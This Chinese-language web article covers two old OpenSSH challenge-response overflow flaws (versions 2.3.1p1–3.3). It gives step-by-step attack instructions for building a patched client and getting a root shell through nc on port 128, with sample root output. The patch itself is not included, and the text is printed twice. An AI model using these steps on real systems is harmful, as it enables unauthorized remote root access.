OpenSSH溢出攻击方法
OpenSSH溢出攻击方法
2006-05-06 | 评论:0
在OpenSSH 2.3.1p1到3.3版本中,关于挑战反应处理代码存在安全性缺陷。允许远程入侵者以sshd(通常是root)进程的身份执行任意指令。
第一个缺陷是因为在挑战反应认证过程中,OpenSSH在处理关于收到的响应次数的变量上存在整型溢出风险,如果挑战反应设置为打开,并且系统使用SKEY或者BSD_AUTH认证选项,则允许攻击者利用此缺陷远程执行任意指令。这个漏洞已经被证实。
第二个缺陷牵涉到使用交互式键盘认证的PAM模块, OpenSSH 2.3.1p1~3.3版本。OpenSSH在处理关于收到的响应次数的变量上存在缓冲溢出风险,不论挑战反应设置如何,系统使用交互式键盘认证的PAM模块(PAMAuthenticationViaKbdInt),可能会导致允许远程非法执行指令的风险。目前尚未有代码证实是否能达到攻击效果。
对这两个缺陷的攻击,都建立在使用SSH ver2的版本特征上。
多个Linux/Unix平台受该漏洞影响。
攻击方法:
1. 下载 openssh-3.2.2p1.tar.gz 并解压
~ $ tar -xvzf openssh-3.2.2p1.tar.gz
2. 执行提供的补丁: (将下方补丁文件存为path_to_diff_file)
~/openssh-3.2.2p1 $ patch < path_to_diff_file
3. 编译已经打过补丁的OpenSSH客户端:
~/openssh-3.2.2p1 $ ./configure && make ssh
4. 运行ssh:
~/openssh-3.2.2p1 $ ./ssh root:skey@localhost
5. 如果成功,则可连接128端口
~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)
(除此之外,bugtraq.org提供了一个打过补丁的SSH攻击客户端:sshutup-theo.tar.gz)
第一个缺陷是因为在挑战反应认证过程中,OpenSSH在处理关于收到的响应次数的变量上存在整型溢出风险,如果挑战反应设置为打开,并且系统使用SKEY或者BSD_AUTH认证选项,则允许攻击者利用此缺陷远程执行任意指令。这个漏洞已经被证实。
第二个缺陷牵涉到使用交互式键盘认证的PAM模块, OpenSSH 2.3.1p1~3.3版本。OpenSSH在处理关于收到的响应次数的变量上存在缓冲溢出风险,不论挑战反应设置如何,系统使用交互式键盘认证的PAM模块(PAMAuthenticationViaKbdInt),可能会导致允许远程非法执行指令的风险。目前尚未有代码证实是否能达到攻击效果。
对这两个缺陷的攻击,都建立在使用SSH ver2的版本特征上。
多个Linux/Unix平台受该漏洞影响。
攻击方法:
1. 下载 openssh-3.2.2p1.tar.gz 并解压
~ $ tar -xvzf openssh-3.2.2p1.tar.gz
2. 执行提供的补丁: (将下方补丁文件存为path_to_diff_file)
~/openssh-3.2.2p1 $ patch < path_to_diff_file
3. 编译已经打过补丁的OpenSSH客户端:
~/openssh-3.2.2p1 $ ./configure && make ssh
4. 运行ssh:
~/openssh-3.2.2p1 $ ./ssh root:skey@localhost
5. 如果成功,则可连接128端口
~ $ nc localhost 128
uname -a
OpenBSD nice 3.1 GENERIC#59 i386
id
uid=0(root) gid=0(wheel) groups=0(wheel)
(除此之外,bugtraq.org提供了一个打过补丁的SSH攻击客户端:sshutup-theo.tar.gz)
| 共8页: 上一页 1 [2] [3] [4] [5] [6] [7] [8] 下一页 |
本 文:OpenSSH溢出攻击方法
下一篇:思科路由器和安全设备管理器
编辑推荐文章
一周阅读排行